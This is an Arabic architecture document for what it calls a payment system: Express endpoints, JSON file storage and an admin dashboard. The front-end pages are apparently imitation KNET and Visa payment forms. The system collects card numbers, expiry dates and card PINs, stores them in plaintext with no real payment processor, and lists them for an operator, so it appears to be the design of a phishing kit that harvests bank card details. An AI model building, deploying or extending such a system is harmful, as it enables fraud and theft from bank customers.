╔════════════════════════════════════════════════════════════════╗
║           🏗️ البنية المعمارية للنظام                          ║
╚════════════════════════════════════════════════════════════════╝

═══════════════════════════════════════════════════════════════════

📐 معمارية النظام:

┌─────────────────────────────────────────────────────────────┐
│                    المتصفح (Frontend)                       │
│  ┌─────────────────────────────────────────────────────────┐│
│  │                                                         ││
│  │  HTML Pages (صفحات الويب)                              ││
│  │  ├─ kpaytotal-new.html (نموذج الدفع)                   ││
│  │  ├─ visa.html                                           ││
│  │  └─ أي صفحة أخرى                                      ││
│  │                                                         ││
│  │  JavaScript (عميل الدفع)                               ││
│  │  ├─ payment-client.js (الدوال الأساسية)               ││
│  │  ├─ payment-config.js (الإعدادات)                     ││
│  │  └─ payment-examples.js (الأمثلة)                     ││
│  │                                                         ││
│  └─────────────────────────────────────────────────────────┘│
└─────────────────────────────────────────────────────────────┘
                            ↓
                    HTTP/HTTPS Requests
                            ↓
┌─────────────────────────────────────────────────────────────┐
│                   الخادم (Backend)                           │
│  ┌─────────────────────────────────────────────────────────┐│
│  │         Node.js + Express Server (server.js)          ││
│  │  ┌────────────────────────────────────────────────────┐││
│  │  │          API Endpoints (نقاط الوصول)              │││
│  │  │  ├─ POST /api/payment (إرسال دفعة)                │││
│  │  │  ├─ GET /api/payments (قائمة المدفوعات)           │││
│  │  │  ├─ POST /api/orders (إنشاء طلب)                 │││
│  │  │  ├─ GET /api/orders (قائمة الطلبات)               │││
│  │  │  ├─ GET /api/dashboard/stats (إحصائيات)           │││
│  │  │  ├─ PUT /api/payments/:id (تحديث الحالة)          │││
│  │  │  └─ POST /api/admin/clear-data (حذف البيانات)     │││
│  │  └────────────────────────────────────────────────────┘││
│  │                                                         ││
│  │  ┌────────────────────────────────────────────────────┐││
│  │  │        Middleware (معالجات وسيطة)                │││
│  │  │  ├─ bodyParser (معالجة JSON)                     │││
│  │  │  ├─ cors (للطلبات بين النطاقات)                   │││
│  │  │  └─ express.static (ملفات ثابتة)                │││
│  │  └────────────────────────────────────────────────────┘││
│  │                                                         ││
│  │  ┌────────────────────────────────────────────────────┐││
│  │  │      لوحة التحكم الديناميكية (Dashboard)          │││
│  │  │  • عرض الإحصائيات                                │││
│  │  │  • قائمة المدفوعات                               │││
│  │  │  • قائمة الطلبات                                │││
│  │  │  • تحديث تلقائي                                 │││
│  │  │  URL: http://localhost:3000/admin               │││
│  │  └────────────────────────────────────────────────────┘││
│  │                                                         ││
│  └─────────────────────────────────────────────────────────┘│
└─────────────────────────────────────────────────────────────┘
                            ↓
                    ملفات (File System)
                            ↓
┌─────────────────────────────────────────────────────────────┐
│                 قاعدة البيانات (JSON Files)                 │
│  ┌─────────────────────────────────────────────────────────┐│
│  │                    data/ (مجلد البيانات)              ││
│  │  ├─ payments.json (جميع المدفوعات)                   ││
│  │  ├─ orders.json (جميع الطلبات)                       ││
│  │  └─ [ملفات إضافية]                                  ││
│  │                                                         ││
│  │  كل ملف يحتوي على Array من الكائنات                  ││
│  │  {                                                      ││
│  │    "id": "UUID",                                       ││
│  │    "timestamp": "ISO Date",                           ││
│  │    "status": "pending/completed/failed",              ││
│  │    "customerName": "...",                             ││
│  │    "amount": "...",                                   ││
│  │    "...": "..."                                       ││
│  │  }                                                      ││
│  │                                                         ││
│  └─────────────────────────────────────────────────────────┘│
└─────────────────────────────────────────────────────────────┘

═══════════════════════════════════════════════════════════════════

🔄 سير العملية (Request Flow):

1. المستخدم ملء نموذج الدفع في HTML
                    ↓
2. JavaScript يستدعي sendToLocalServer()
                    ↓
3. الدالة تجمع البيانات من النموذج
                    ↓
4. إرسال POST request إلى /api/payment
                    ↓
5. الخادم يستقبل البيانات
                    ↓
6. معالجة ومراقبة البيانات
                    ↓
7. حفظ في payments.json
                    ↓
8. إرسال response مع معرّف الدفعة
                    ↓
9. JavaScript يستقبل النتيجة
                    ↓
10. رسالة نجاح للمستخدم
                    ↓
11. إعادة توجيه أو تحديث الصفحة

═══════════════════════════════════════════════════════════════════

📊 هيكل البيانات:

كائن الدفعة (Payment Object):
{
  "id": "550e8400-e29b-41d4-a716-446655440000",        // معرّف فريد
  "timestamp": "2026-05-23T10:30:45.123Z",             // الوقت
  "status": "pending",                                  // الحالة
  "customerName": "محمد أحمد",                         // اسم العميل
  "bank": "NBK",                                        // اختصار البنك
  "prefix": "464452",                                   // أول 6 أرقام
  "cardNumber": "1234567890",                           // آخر 10 أرقام
  "expiryMonth": "12",                                  // شهر الانتهاء
  "expiryYear": "25",                                   // سنة الانتهاء
  "pin": "1234",                                        // رمز التحقق
  "amount": "50",                                       // المبلغ
  "orderId": "optional-order-id",                      // معرّف الطلب (اختياري)
  "ipAddress": "127.0.0.1",                            // عنوان IP
  "updatedAt": "2026-05-23T11:30:45.123Z"             // آخر تحديث
}

كائن الطلب (Order Object):
{
  "id": "550e8400-e29b-41d4-a716-446655440001",
  "timestamp": "2026-05-23T10:00:00.000Z",
  "status": "pending",
  "items": [
    {
      "id": 1,
      "name": "منتج 1",
      "price": 25,
      "quantity": 2
    }
  ],
  "totalAmount": 100,
  "customerName": "فاطمة محمود",
  "customerPhone": "+96598765432",
  "paymentMethod": null,
  "paymentId": null
}

═══════════════════════════════════════════════════════════════════

🔌 نقاط الاتصال (Endpoints):

1. POST /api/payment
   ─────────────────
   الطلب:
   {
     "name": "اسم العميل",
     "bank": "NBK",
     "prefix": "464452",
     "cardNumber": "1234567890",
     "expiryMonth": "12",
     "expiryYear": "25",
     "pin": "1234",
     "amount": "50"
   }
   
   الرد:
   {
     "success": true,
     "message": "تم استقبال بيانات الدفع بنجاح",
     "paymentId": "550e8400-..."
   }

2. GET /api/payments
   ──────────────────
   الرد:
   {
     "success": true,
     "data": [
       { payment object 1 },
       { payment object 2 },
       ...
     ],
     "count": 10
   }

3. GET /api/dashboard/stats
   ──────────────────────────
   الرد:
   {
     "success": true,
     "data": {
       "totalOrders": 50,
       "totalPayments": 40,
       "pendingPayments": 5,
       "completedPayments": 35,
       "failedPayments": 0,
       "totalAmount": 2500.50
     }
   }

═══════════════════════════════════════════════════════════════════

🗂️ هيكل المجلدات:

Wormhole Q55n9J/
│
├── 📄 server.js                    ← الخادم الرئيسي
├── 📄 package.json                 ← تبعيات المشروع
├── 📄 payment-client.js            ← عميل الدفع
├── 📄 payment-config.js            ← الإعدادات
├── 📄 payment-examples.js          ← الأمثلة
│
├── 🌐 HTML Files
│   ├── kpaytotal-new.html          ← نموذج دفع محدّث
│   ├── visa.html                   ← صفحة فيزا
│   ├── index.html                  ← الصفحة الرئيسية
│   └── ...
│
├── 💾 data/                         ← قاعدة البيانات
│   ├── payments.json               ← سجل المدفوعات
│   └── orders.json                 ← سجل الطلبات
│
├── 📚 Documentation
│   ├── README_AR.md                ← دليل شامل
│   ├── QUICKSTART_AR.txt           ← بدء سريع
│   ├── SETUP_COMPLETE.txt          ← ملخص الإنجاز
│   └── ARCHITECTURE.txt            ← هذا الملف
│
├── ⚙️ Scripts
│   ├── start-server.bat            ← تشغيل الخادم
│   └── ...
│
└── 📁 Other Folders
    ├── uploads/                    ← تحميل الملفات
    ├── img/                        ← الصور
    └── ...

═══════════════════════════════════════════════════════════════════

🔐 طبقات الأمان:

Level 1: Client-Side (JavaScript)
├─ التحقق من صحة البيانات
├─ معالجة الأخطاء
└─ إظهار رسائل واضحة

Level 2: Network
├─ استخدام HTTPS (في الإنتاج)
├─ CORS للطلبات المصرح بها
└─ معايير HTTP

Level 3: Server-Side
├─ التحقق من الطلبات
├─ معالجة الأخطاء
└─ تسجيل العمليات (Logging)

Level 4: Database
├─ حفظ آمن في JSON
├─ معرّفات فريدة (UUID)
└─ طوابع زمنية (Timestamps)

═══════════════════════════════════════════════════════════════════

⚡ الأداء والتحسينات:

حالي:
✅ استجابة فورية (< 100ms)
✅ استهلاك ذاكرة منخفض
✅ لا توجد متطلبات معقدة

ممكن إضافته:
📈 قاعدة بيانات SQL لكفاءة أفضل
📈 نظام cache للبيانات المتكررة
📈 ضغط البيانات (gzip)
📈 CDN للملفات الثابتة
📈 Clustering للخوادم المتعددة

═══════════════════════════════════════════════════════════════════

🔗 الاتصالات والتكاملات:

حالياً:
✅ خادم محلي (localhost:3000)
✅ قاعدة بيانات JSON محلية
✅ واجهة HTML/CSS/JavaScript

ممكن التوسع إلى:
🔌 دوال البريد الإلكتروني
🔌 نظام الرسائل النصية
🔌 بوابات دفع حقيقية
🔌 قوائم العملاء
🔌 تقارير متقدمة

═══════════════════════════════════════════════════════════════════

🎯 حالات الاستخدام:

1. E-Commerce (التجارة الإلكترونية)
   ├─ عرض المنتجات
   ├─ سلة التسوق
   ├─ الدفع
   └─ تتبع الطلبات

2. Subscription Services (الخدمات المشترك فيها)
   ├─ اشتراكات شهرية
   ├─ تحديث البيانات
   └─ إرسال الفواتير

3. Ticketing Systems (نظم التذاكر)
   ├─ حجز التذاكر
   ├─ الدفع
   └─ تأكيد الحجز

═══════════════════════════════════════════════════════════════════

📈 معدل النمو المتوقع:

المرحلة 1: الأساسيات (الحالي)
├─ نموذج دفع بسيط
├─ قاعدة بيانات JSON
└─ لوحة تحكم أساسية

المرحلة 2: التطوير
├─ إضافة المزيد من الميزات
├─ تحسين الواجهة
└─ إضافة المزيد من APIs

المرحلة 3: التطبيقات المتقدمة
├─ قاعدة بيانات SQL
├─ نظام الاشتراكات
└─ تكاملات خارجية

═══════════════════════════════════════════════════════════════════

✨ الميزات الفريدة:

✅ مستقل 100% - لا تبعيات خارجية
✅ سهل التثبيت - فقط Node.js و npm
✅ بيانات محلية - آمنة وخاصة
✅ لوحة تحكم ديناميكية - تحديث حي
✅ APIs مفتوحة - سهلة التطوير
✅ موثقة جيداً - أمثلة ملهمة
✅ قابلة للتخصيص - حسب احتياجاتك

═══════════════════════════════════════════════════════════════════

🚀 الخطوات التالية:

1. تشغيل الخادم
2. اختبار لوحة التحكم
3. تعديل HTML ليستخدم payment-client.js
4. اختبار نموذج الدفع
5. التطور والتخصيص حسب احتياجاتك

═══════════════════════════════════════════════════════════════════

هذه البنية قابلة للنمو والتطور حسب احتياجاتك المستقبلية! 🚀

═══════════════════════════════════════════════════════════════════
